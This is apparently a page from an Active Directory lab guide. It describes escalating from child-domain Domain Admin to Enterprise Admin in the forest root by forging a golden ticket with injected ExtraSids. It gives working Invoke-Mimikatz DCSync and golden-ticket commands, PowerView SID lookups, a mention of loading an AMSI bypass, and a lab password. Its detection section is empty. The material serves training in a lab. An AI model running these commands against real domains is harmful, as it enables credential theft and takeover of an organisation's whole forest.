# Krbtgt hash

## Attacking

### How it works

Once you hold Domain Admin privileges in a child domain, it is possible to become Enterprise Admin in the parent (forest root) domain. With the child domain's krbtgt hash you forge a golden ticket for the child domain and place the SID of the parent domain's Enterprise Admins group in the ticket's SID history (ExtraSids) field. Because SID filtering is not enforced on intra-forest (parent-child) trusts, the parent domain honours that extra SID and treats the forged user as an Enterprise Admin.

### Tools

* [Invoke-Mimikatz (Nishang)](https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1)
* [PowerView](https://github.com/PowerShellMafia/PowerSploit/blob/master/Recon/PowerView.ps1)

### Executing the attack

The attack assumes you have already obtained Domain Admin privileges in the child domain. One way to get there is described in the unconstrained delegation section:

{% content-ref url="../../delegation-attacks/unconstrained-delegation" %}
[unconstrained-delegation](https://ad-lab.gitbook.io/building-a-windows-ad-lab/vulnerabilities-and-misconfigurations-and-attacks/active-directory-attacks/delegation-attacks/unconstrained-delegation)
{% endcontent-ref %}

1. For easy execution, login on `WS01` as the `Administrator` user with the password `Welcome01!`.
2. Start PowerShell as Administrator and load an AMSI bypass and Invoke-Mimikatz into memory.

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FeuHHlLcVqWNRDOyTIJPp%2Fimage.png?alt=media&#x26;token=73e559e5-6ea5-4250-8017-a84dec8632d9" alt=""></div>

To execute the attack we need a couple bits of information:

* The hash of the krbtgt user.
* The SID of the Enterprise Admins group.
* The SID of the child domain.

3\. Execute a DCSync with Invoke-Mimikatz and retrieve only the krbtgt hash of the child domain (this requires replication rights, which Domain Admins in the child domain have):

```
Invoke-Mimikatz -Command '"lsadump::dcsync /user:amsterdam\krbtgt /domain:amsterdam.bank.local"'
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2Fa5gv2uCf5QDd7d5Ihu47%2Fimage.png?alt=media&#x26;token=0e68a50e-fb94-44e1-be75-91d6c1e32c11" alt=""></div>

4\. Retrieve the SID of the Enterprise Admins group in the parent (forest root) domain, using PowerView. Its RID is always 519, so the SID ends in `-519`:

```
Get-DomainGroup "Enterprise Admins" -Domain bank.local | Select-Object samaccountname, objectsid
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2F6GXd3KjuAEjMJOVOjgJ4%2Fimage.png?alt=media&#x26;token=e3a998a4-54fc-4f19-9f4d-0fb460ffbe56" alt=""></div>

5\. Retrieve the SID of the child domain (the domain the forged ticket is issued for), using PowerView on the child-domain-joined host:

```
Get-DomainSID
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FOrjfY6XkLxLSBApum12n%2Fimage.png?alt=media&#x26;token=efdb3b8e-a18a-43ca-b3ae-d229464dd4d6" alt=""></div>

6\. Create a golden ticket with Invoke-Mimikatz and inject it into the current session (`/ptt`). The `/sid` value is the child domain SID, the `/krbtgt` value is the NT hash from step 3, and the `/sids` value is the Enterprise Admins SID from step 4, which Mimikatz writes into the ExtraSids (SID history) field of the ticket:

```
Invoke-Mimikatz -Command '"kerberos::golden /user:Administrator /domain:<FQDN CHILD DOMAIN> /sid:<CHILD DOMAIN SID> /krbtgt:<HASH> /sids:<SIDS OF ENTERPRISE ADMIN GROUP OF TARGET> /ptt"'
```

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FW9mMXZCyjkE2Dh5UOf7Z%2Fimage.png?alt=media&#x26;token=5b57cabc-d5b8-424f-8fc9-aa74df1d92f3" alt=""></div>

7\. The ticket was injected successfully. To confirm that the parent domain honours the extra SID, list the `C$` administrative share of the parent domain controller; a successful directory listing shows the forged user has administrative access to the parent DC:

<div align="left"><img src="https://1033393870-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2FPqGbN7FCY7Xh4OkOtvin%2Fuploads%2FpCWXjKXjdRkvCrFBGYFV%2Fimage.png?alt=media&#x26;token=186ccc49-6391-4508-8bba-2f51d9e18f8c" alt=""></div>

## Defending

### Detection

## References

{% embed url="https://github.com/samratashok/nishang/blob/master/Gather/Invoke-Mimikatz.ps1" %}
